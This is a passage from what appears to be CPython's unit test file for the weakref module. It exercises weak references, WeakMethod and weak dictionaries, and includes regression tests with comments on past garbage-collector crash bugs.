"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlaying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
